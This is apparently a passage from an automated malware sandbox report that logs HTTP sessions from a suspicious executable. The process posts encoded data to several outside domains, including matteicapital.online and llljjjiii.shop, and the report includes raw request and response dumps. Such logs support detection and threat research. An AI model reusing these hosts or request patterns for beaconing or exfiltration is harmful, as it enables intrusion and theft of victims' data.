                                                                                  Data Ascii: lH_L4=W5fxfSf2hjR1H+3kA3rFOjd1qC1REyJ0MHjG5x9nBTqMKF5PB7ZiXllX9RnsFab4U94iLxlV3HCA2liQRoAdq9dP9KR+7c6TYlJOlyLW5+AqlwSX1phfo/0e/jeZdC9RJ2qd1+FogBiD9LNZWvkwsBtYWwqIy1ORIshpvZxt/h+stfzgRXbCTu1RoLkNh2rShllQhGO8cNMUINRTWNwdV6Iu788C8fyS4bVp8XTYgA7GwbWxLTp/dIBJ3E99LRbuvx6UqxHAL98MhkPFMw3gLQBCnf7C1P6f3esFmD12c6DYyYNDnLJIZkk5lP/+YCHGEAfWLQBlslrWkkS4TD8wJX/RF8ec/SLfasoB7h0Us4sqjTUyiQEJj8GS4V4qw46+zpJFklNOzLhq4LiXi5bA5MRO0ET/ZqHR9cbKv5B5DfUWUWSeqz6GfsC+Or3m030rsEMB3H6XmsowY/Ead+G6GAYZpp1YOS1PMehMsRoIxmjlu1WZY+0ndG6rXrxlbZxLkUyoym588GtJjRpM/IbyMtYI6xQ+PYO1e22nDPuVfk1zKwjLgKzwkx3fiQgh8s82VfCu+q8mhDaDf8jTLXxPhHLSO4bD+rkeYUPS9jZbjwz2exApxUl8q0JtAlX97f4N/viGoK1o13KjQnbVir8Q4A0y/GiN0PfbnLQZvepNXCcIsgr8WlDDwj0yt2Rqqk9xkbGRS5Gw8U7EYf5t+hj0uURZhWq0LWOUdIAS7MlVmSlSOilQjghitohVLXhA4iKai/y5cOfVmOfDlwOKoYc8QOlXpxi5t89Sy6E0jNwkVpy0LNGXj9kuo63PE58/DD+iJ2KFx1FkeQ9eK+kjuF+J8ndYQ5DhJ416ucZ7RGmcn4dh71/DRDrGFw90qaYksLfnutKr6Ud7KSPhrTeLofrElsIPZa86zhjr6YGwJON9P2f3Cc657dXOt0/Fy740jMoWgv4nt8M7TxKDf7m6jzM3d9W3B1Vz9qNhRaNyJZFscHsHBO [TRUNCATED]


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  20192.168.2.54998047.76.213.197803812C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 27, 2024 01:27:09.344810963 CET356OUTGET /egqi/?lH_L4=b73RclDzsQx9LNfVP0mvFBo4qCNcPXUUZl7U/15lM3StUAJAIINJCW5I+z7gQYXdXqIUVixe3UGJ61mgF9Q8ksZ6wdRJyvWXXW5woHrN3vUqlgOg2KxD9o0N2wzkcF8JdQ==&005PE=aNcLxhD894SLKl HTTP/1.1
                                                                                  Host: www.ytsd88.top
                                                                                  Accept: */*
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                  Nov 27, 2024 01:27:10.929296017 CET574INHTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Wed, 27 Nov 2024 00:27:10 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 409
                                                                                  Connection: close
                                                                                  ETag: "66d016cf-199"
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0a 3c 73 74 79 6c 65 3e 0a 09 2e 62 74 6c 69 6e 6b 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 32 30 61 35 33 61 3b 0a 09 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 35 70 78 22 20 3e 50 6f 77 65 72 20 62 79 20 3c 61 20 63 6c 61 73 73 3d 22 62 74 6c 69 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 74 2e 63 6e 2f 3f 66 72 6f 6d 3d 34 30 34 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e e5 a0 a1 e5 a1 94 20 28 e5 [TRUNCATED]
                                                                                  Data Ascii: <html><style>.btlink {color: #20a53a;text-decoration: none;}</style><meta charset="UTF-8"><html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><div style="text-align: center;font-size: 15px" >Power by <a class="btlink" href="https://www.bt.cn/?from=404" target="_blank"> ()</a></div></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  21192.168.2.549992208.91.197.27803812C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 27, 2024 01:27:16.783996105 CET630OUTPOST /hyyd/ HTTP/1.1
                                                                                  Host: www.matteicapital.online
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Origin: http://www.matteicapital.online
                                                                                  Cache-Control: max-age=0
                                                                                  Content-Length: 206
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Referer: http://www.matteicapital.online/hyyd/
                                                                                  User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                  Data Raw: 6c 48 5f 4c 34 3d 53 6f 4e 72 56 68 5a 49 54 4e 54 79 56 55 49 64 6e 47 68 68 34 68 66 4f 56 51 50 49 48 71 63 6c 33 61 33 56 6b 70 30 30 44 47 32 66 6f 49 4b 50 58 54 4b 6f 72 66 72 6c 78 57 64 46 57 4e 4e 77 4f 56 50 73 6d 79 33 2b 51 6f 4c 51 2f 44 34 6c 31 58 69 37 35 69 6a 55 61 79 57 75 47 57 58 5a 4a 69 6a 41 34 36 54 43 50 68 6f 37 41 69 36 36 73 48 30 58 49 36 4b 78 49 35 38 63 52 2b 4f 47 65 69 78 34 78 71 64 58 55 2f 4c 2f 4c 5a 32 49 73 59 62 43 50 39 31 50 68 54 54 39 66 48 79 38 6d 31 33 6c 55 4a 7a 78 56 2b 72 72 44 46 34 49 74 76 39 55 58 63 4c 51 7a 2f 57 33 46 69 56 42 68 45 74 6c 35 63 30 3d
                                                                                  Data Ascii: lH_L4=SoNrVhZITNTyVUIdnGhh4hfOVQPIHqcl3a3Vkp00DG2foIKPXTKorfrlxWdFWNNwOVPsmy3+QoLQ/D4l1Xi75ijUayWuGWXZJijA46TCPho7Ai66sH0XI6KxI58cR+OGeix4xqdXU/L/LZ2IsYbCP91PhTT9fHy8m13lUJzxV+rrDF4Itv9UXcLQz/W3FiVBhEtl5c0=


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  22192.168.2.549998208.91.197.27803812C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 27, 2024 01:27:19.440047979 CET650OUTPOST /hyyd/ HTTP/1.1
                                                                                  Host: www.matteicapital.online
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Origin: http://www.matteicapital.online
                                                                                  Cache-Control: max-age=0
                                                                                  Content-Length: 226
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Referer: http://www.matteicapital.online/hyyd/
                                                                                  User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                  Data Raw: 6c 48 5f 4c 34 3d 53 6f 4e 72 56 68 5a 49 54 4e 54 79 48 67 4d 64 72 46 35 68 76 52 66 4e 61 77 50 49 4d 4b 63 68 33 61 37 56 6b 72 5a 70 44 30 43 66 70 70 36 50 47 68 79 6f 6f 66 72 6c 36 32 64 45 59 74 4e 6e 4f 56 53 66 6d 7a 4c 2b 51 73 6a 51 2f 47 63 6c 31 6b 36 34 35 79 6a 57 4f 43 57 57 49 32 58 5a 4a 69 6a 41 34 35 75 58 50 68 77 37 42 53 4b 36 2b 57 31 6c 54 61 4b 79 50 35 38 63 47 75 4f 4b 65 69 77 76 78 70 59 79 55 35 50 2f 4c 5a 47 49 73 4a 62 42 47 39 31 46 2b 44 54 74 57 69 72 71 6b 30 54 43 64 5a 47 6b 4f 50 6e 73 43 7a 4a 69 33 4e 31 38 45 38 6e 6f 6a 73 65 41 55 53 30 6f 37 6e 39 56 6e 4c 6a 6b 71 34 55 45 41 4b 34 49 33 73 66 2f 39 33 49 69 55 48 50 46
                                                                                  Data Ascii: lH_L4=SoNrVhZITNTyHgMdrF5hvRfNawPIMKch3a7VkrZpD0Cfpp6PGhyoofrl62dEYtNnOVSfmzL+QsjQ/Gcl1k645yjWOCWWI2XZJijA45uXPhw7BSK6+W1lTaKyP58cGuOKeiwvxpYyU5P/LZGIsJbBG91F+DTtWirqk0TCdZGkOPnsCzJi3N18E8nojseAUS0o7n9VnLjkq4UEAK4I3sf/93IiUHPF


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  23192.168.2.550004208.91.197.27803812C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 27, 2024 01:27:22.100759029 CET1667OUTPOST /hyyd/ HTTP/1.1
                                                                                  Host: www.matteicapital.online
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Origin: http://www.matteicapital.online
                                                                                  Cache-Control: max-age=0
                                                                                  Content-Length: 1242
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Referer: http://www.matteicapital.online/hyyd/
                                                                                  User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                  Data Raw: 6c 48 5f 4c 34 3d 53 6f 4e 72 56 68 5a 49 54 4e 54 79 48 67 4d 64 72 46 35 68 76 52 66 4e 61 77 50 49 4d 4b 63 68 33 61 37 56 6b 72 5a 70 44 30 36 66 70 66 6d 50 58 32 6d 6f 70 66 72 6c 33 57 64 4a 59 74 4d 6c 4f 56 4b 54 6d 7a 47 4a 51 75 62 51 2b 67 51 6c 69 6c 36 34 33 79 6a 57 4d 43 57 74 47 57 57 45 4a 69 7a 45 34 35 2b 58 50 68 77 37 42 55 6d 36 39 48 31 6c 55 71 4b 78 49 35 38 49 52 2b 4f 6d 65 69 70 61 78 6f 74 48 55 4b 48 2f 4c 35 57 49 76 2f 48 42 48 64 31 44 2f 44 53 79 57 69 75 30 6b 30 66 5a 64 5a 44 73 4f 49 72 73 50 31 41 70 74 76 41 71 52 65 7a 4c 70 38 47 58 41 6c 77 6a 35 55 31 63 37 59 7a 2b 72 70 38 34 49 66 41 6c 6b 50 69 64 76 68 63 54 5a 51 79 4c 74 49 6f 67 43 66 41 37 35 4b 5a 63 74 31 48 78 6a 76 7a 58 35 4f 74 54 71 4d 65 63 59 41 6c 50 69 35 42 32 67 73 46 77 66 2b 73 59 68 52 78 77 35 6a 33 6f 72 4a 30 67 31 66 55 66 74 52 73 2b 34 68 31 74 71 77 33 66 6f 58 5a 51 2f 68 57 72 58 75 72 41 74 52 49 42 62 7a 4a 49 7a 61 51 57 53 4b 70 44 35 37 4c 46 39 4d 6e 4e 68 5a 49 54 [TRUNCATED]
                                                                                  Data Ascii: lH_L4=SoNrVhZITNTyHgMdrF5hvRfNawPIMKch3a7VkrZpD06fpfmPX2mopfrl3WdJYtMlOVKTmzGJQubQ+gQlil643yjWMCWtGWWEJizE45+XPhw7BUm69H1lUqKxI58IR+OmeipaxotHUKH/L5WIv/HBHd1D/DSyWiu0k0fZdZDsOIrsP1AptvAqRezLp8GXAlwj5U1c7Yz+rp84IfAlkPidvhcTZQyLtIogCfA75KZct1HxjvzX5OtTqMecYAlPi5B2gsFwf+sYhRxw5j3orJ0g1fUftRs+4h1tqw3foXZQ/hWrXurAtRIBbzJIzaQWSKpD57LF9MnNhZIThBCwZNNy+2nld3YnxJf+v7Qx9WHD7h1pAIoMZaugBhOk1PQ39GitvKalCc40dzHtmgFZ/07fZdAeeV65kDcck9pSdHZ48ZuRTP//TzDqoaKDZqQXgK23BvLm/XSz5XMLetyNYqBlrPt0Fl1ZbJZc8a1hdjISBsmxG0A3TjcjfuWqqggh9vjfuG5jdB23mm5taVgaBZGLp0YJxBxhHXs55Ui1Fq/Kn6EshZ/9vQUglAMyW13MihRyo/jiFLHdkesVRUepcNaIrkJoRgL3t2k33FHLBJMXA0YhchXeRXE8HnUegurWpz42q4d6EKJT2TurYbEEt/ayx1h2AErKhunDA8Lcn4H6NLaIBHNFQ/5sgLs8LrxEvploS/y6xAxTd5iHV6MuT7IX4DqN0S0LY17DT711YnYHpo4nwcC9ItQPcLiFPkrLJ4S25LHnRQMJ9uUA6NgNqdGcYnppe+MP3muKkbe1yLQeRp/ZDmzFrRkiSSrHvv/XG0g2j+02H+ozgRWEHKnchnxSyomNwm8RoBMRuf3k9TPfDolFJncmsw3NDoYuQy+egxAVZZzWF9x8OiQ7hzkoT8cU7Lbe0jrbkaZV+5xHfgx3Xy35lV92UQkSm7l5PgKK35tA4GyKRI7t1tiFaFWN/sGWAG/hwdlXtoUBrHK6N7UxaM/SnT [TRUNCATED]


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  24192.168.2.550005208.91.197.27803812C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 27, 2024 01:27:24.764094114 CET366OUTGET /hyyd/?005PE=aNcLxhD894SLKl&lH_L4=fqlLWWUWU+rKW3EBskUV6SGgNRnmDoU2hpWkksgzCQayp6WkBROPj8SoyGxHGehCRFG0wA/ATtWP72Uz33qX2RXlPUSmGQTIeTj0jYuHFw88ATfT6HkRUZetCKkJWJDjJA== HTTP/1.1
                                                                                  Host: www.matteicapital.online
                                                                                  Accept: */*
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                  Nov 27, 2024 01:27:26.225665092 CET1236INHTTP/1.1 200 OK
                                                                                  Date: Wed, 27 Nov 2024 00:27:25 GMT
                                                                                  Server: Apache
                                                                                  Referrer-Policy: no-referrer-when-downgrade
                                                                                  Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                                                                                  Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                                                                                  Set-Cookie: vsid=908vr480212845903186170; expires=Mon, 26-Nov-2029 00:27:25 GMT; Max-Age=157680000; path=/; domain=www.matteicapital.online; HttpOnly
                                                                                  X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_hefu52TCdN0R6kEAzYny50qQ18/u8lVi0LA4hdkeewlmh01lmGWCkIakgFqfrXIsmJEPbR25fyz9OVHl7NrVQA==
                                                                                  Content-Length: 2640
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Connection: close
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4b 58 37 34 69 78 70 7a 56 79 58 62 4a 70 72 63 4c 66 62 48 34 70 73 50 34 2b 4c 32 65 6e 74 71 72 69 30 6c 7a 68 36 70 6b 41 61 58 4c 50 49 63 63 6c 76 36 44 51 42 65 4a 4a 6a 47 46 57 72 42 49 46 36 51 4d 79 46 77 58 54 35 43 43 52 79 6a 53 32 70 65 6e 45 43 41 77 45 41 41 51 3d 3d 5f 68 65 66 75 35 32 54 43 64 4e 30 52 36 6b 45 41 7a 59 6e 79 35 30 71 51 31 38 2f 75 38 6c 56 69 30 4c 41 34 68 64 6b 65 65 77 6c 6d 68 30 31 6c 6d 47 57 43 6b 49 61 6b 67 46 71 66 72 58 49 73 6d 4a 45 50 62 52 32 35
                                                                                  Data Ascii: <!DOCTYPE html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_hefu52TCdN0R6kEAzYny50qQ18/u8lVi0LA4hdkeewlmh01lmGWCkIakgFqfrXIsmJEPbR25
                                                                                  Nov 27, 2024 01:27:26.225786924 CET1236INData Raw: 66 79 7a 39 4f 56 48 6c 37 4e 72 56 51 41 3d 3d 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 61 62 70 3b 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70
                                                                                  Data Ascii: fyz9OVHl7NrVQA=="><head><script type="text/javascript">var abp;</script><script type="text/javascript" src="http://www.matteicapital.online/px.js?ch=1"></script><script type="text/javascript" src="http://www.matteicapital.online/px.js?ch=2
                                                                                  Nov 27, 2024 01:27:26.225795031 CET256INData Raw: 73 74 79 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 57 22 20 6e 61 6d 65 3d 22 65 78 70 69 72 65 73 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c
                                                                                  Data Ascii: style> <meta content="NOW" name="expires"> <meta content="index, follow, all" name="GOOGLEBOT"> <meta content="index, follow, all" name="robots"> ... Following Meta-Tag fixes scaling-issues on mobile devices --> <meta
                                                                                  Nov 27, 2024 01:27:26.225806952 CET907INData Raw: 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 3b 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 3b 22 20 6e 61 6d 65 3d 22 76 69 65
                                                                                  Data Ascii: th=device-width; initial-scale=1.0; maximum-scale=1.0; user-scalable=0;" name="viewport"></head><body><div id="partner"></div><script type="text/javascript"> document.write( '<script type="text/javascript" language="J


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  25192.168.2.5500068.210.114.150803812C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 27, 2024 01:27:32.919441938 CET612OUTPOST /rsvy/ HTTP/1.1
                                                                                  Host: www.llljjjiii.shop
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Origin: http://www.llljjjiii.shop
                                                                                  Cache-Control: max-age=0
                                                                                  Content-Length: 206
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Referer: http://www.llljjjiii.shop/rsvy/
                                                                                  User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                  Data Raw: 6c 48 5f 4c 34 3d 6d 2b 37 4b 49 4d 74 4a 34 2f 42 54 33 4b 49 67 36 67 64 6b 34 54 50 67 68 67 43 44 55 7a 30 42 6f 6e 7a 50 46 35 63 4d 31 5a 6a 77 31 56 77 49 50 6b 54 45 34 63 66 42 4d 57 30 52 4a 58 4e 37 4f 67 65 2b 61 57 48 62 79 43 33 6a 45 72 45 62 6d 75 31 49 42 76 36 52 79 30 6f 66 39 53 66 69 35 6a 36 37 34 61 48 32 62 65 79 55 43 77 59 72 36 31 68 34 73 63 6f 4c 5a 2f 74 74 30 63 43 30 6f 30 36 6c 55 64 36 78 33 38 39 6c 30 58 32 58 6e 66 64 34 50 6d 39 56 6a 36 62 7a 31 55 74 4f 4a 4c 36 32 38 71 6b 43 49 39 74 4a 37 6a 63 4d 61 43 4b 62 55 65 37 36 31 4c 4a 46 64 36 43 62 62 4a 78 66 74 70 59 3d
                                                                                  Data Ascii: lH_L4=m+7KIMtJ4/BT3KIg6gdk4TPghgCDUz0BonzPF5cM1Zjw1VwIPkTE4cfBMW0RJXN7Oge+aWHbyC3jErEbmu1IBv6Ry0of9Sfi5j674aH2beyUCwYr61h4scoLZ/tt0cC0o06lUd6x389l0X2Xnfd4Pm9Vj6bz1UtOJL628qkCI9tJ7jcMaCKbUe761LJFd6CbbJxftpY=
                                                                                  Nov 27, 2024 01:27:34.335968018 CET925INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 27 Nov 2024 00:27:34 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Vary: Accept-Encoding
                                                                                  Set-Cookie: PHPSESSID=hu051vtear25fibq2dqti0kr80; path=/
                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                  Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                  Pragma: no-cache
                                                                                  Set-Cookie: sessionid=hu051vtear25fibq2dqti0kr80; expires=Sat, 25-Nov-2034 00:27:34 GMT; Max-Age=315360000; path=/
                                                                                  Content-Encoding: gzip
                                                                                  Data Raw: 31 38 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 6d 52 d9 6e 9c 30 14 7d cf 57 dc 3a aa e6 25 06 66 49 53 61 20 52 22 e5 b1 ff 70 31 0e 78 e2 85 da 66 02 fd fa 1a 33 5d 22 e5 ed de e3 63 9f 45 ae 86 a0 55 73 53 0d 02 bb e6 06 a0 d2 22 20 18 d4 a2 26 17 29 de 47 eb 02 01 6e 4d 10 26 d4 e4 5d 76 61 a8 3b 71 91 5c d0 b4 dc 49 23 83 44 45 3d 47 25 ea fd 9d 8e 80 9e f4 bf 1d e7 0f fb e4 85 4b 87 d8 46 be b1 04 f2 24 ec b9 93 63 00 ef 78 4d f2 71 6a 95 e4 f9 19 2f b8 e1 f9 f9 e7 24 dc 42 0f d9 21 3b 66 51 23 3b fb c7 4b 4d 00 c2 32 46 af 41 cc e1 3f 3a 69 aa 7c bb 18 b3 e5 5b b8 aa b5 dd 02 3e 2c 51 96 b4 c8 df 7a 67 27 d3 51 6e 95 75 25 dc 7e eb f0 9e 1f 19 89 37 a4 ee af c4 9d c6 79 0b 5a c2 a9 28 c6 99 a5 d4 25 ec 8b e2 2b 1b ad 8f e1 ad 29 01 5b 6f d5 14 04 73 b2 1f 42 09 05 0b 76 2c e1 18 49 4a bc 26 40 a3 eb 65 a4 16 80 53 b0 6c f7 31 aa d4 d8 8b fc 54 9c b2 d1 f4 24 56 52 7d a1 b4 1a f6 7f 7c 5c 65 37 0f 9f e8 6e af d3 4d 8c 1e 92 d5 2b 96 9c d0 ef 2b 92 c6 fb bf a6 d6 a9 93 7e 54 b8 94 d0 2a cb df d8 [TRUNCATED]
                                                                                  Data Ascii: 18dmRn0}W:%fISa R"p1xf3]"cEUsS" &)GnM&]va;q\I#DE=G%KF$cxMqj/$B!;fQ#;KM2FA?:i|[>,Qzg'Qnu%~7yZ(%+)[osBv,IJ&@eSl1T$VR}|\e7nM++~T*/*M'}yzx~xfkcp&r6Z&kka~1h0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  26192.168.2.5500078.210.114.150803812C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 27, 2024 01:27:35.835099936 CET632OUTPOST /rsvy/ HTTP/1.1
                                                                                  Host: www.llljjjiii.shop
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Origin: http://www.llljjjiii.shop
                                                                                  Cache-Control: max-age=0
                                                                                  Content-Length: 226
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Referer: http://www.llljjjiii.shop/rsvy/
                                                                                  User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                  Data Raw: 6c 48 5f 4c 34 3d 6d 2b 37 4b 49 4d 74 4a 34 2f 42 54 32 71 34 67 38 42 64 6b 36 7a 50 2f 75 41 43 44 4f 44 30 64 6f 6e 76 50 46 38 39 58 31 4d 37 77 30 78 30 49 4f 6c 54 45 2f 63 66 42 45 32 30 55 4e 58 4e 77 4f 67 54 42 61 58 37 62 79 43 7a 6a 45 6f 51 62 6e 64 64 4c 51 76 36 54 72 6b 6f 64 7a 79 66 69 35 6a 36 37 34 65 58 59 62 65 61 55 43 68 49 72 37 58 5a 2f 33 38 6f 49 4a 50 74 74 6a 4d 44 39 6f 30 36 54 55 59 62 61 33 35 35 6c 30 57 47 58 6d 4b 78 33 45 6d 39 54 2b 4b 62 69 79 48 63 64 47 36 53 6d 77 61 70 34 59 63 52 7a 7a 31 74 6d 41 67 43 7a 48 2b 58 43 6c 59 42 79 4d 4b 6a 79 42 71 68 76 7a 2b 4f 53 4a 35 50 4e 74 64 4e 48 7a 2f 75 43 50 53 31 6e 33 6c 42 32
                                                                                  Data Ascii: lH_L4=m+7KIMtJ4/BT2q4g8Bdk6zP/uACDOD0donvPF89X1M7w0x0IOlTE/cfBE20UNXNwOgTBaX7byCzjEoQbnddLQv6Trkodzyfi5j674eXYbeaUChIr7XZ/38oIJPttjMD9o06TUYba355l0WGXmKx3Em9T+KbiyHcdG6Smwap4YcRzz1tmAgCzH+XClYByMKjyBqhvz+OSJ5PNtdNHz/uCPS1n3lB2
                                                                                  Nov 27, 2024 01:27:37.283399105 CET925INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 27 Nov 2024 00:27:37 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Vary: Accept-Encoding
                                                                                  Set-Cookie: PHPSESSID=coq3s71no38ckfrjt3muer1bc5; path=/
                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                  Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                  Pragma: no-cache
                                                                                  Set-Cookie: sessionid=coq3s71no38ckfrjt3muer1bc5; expires=Sat, 25-Nov-2034 00:27:36 GMT; Max-Age=315360000; path=/
                                                                                  Content-Encoding: gzip
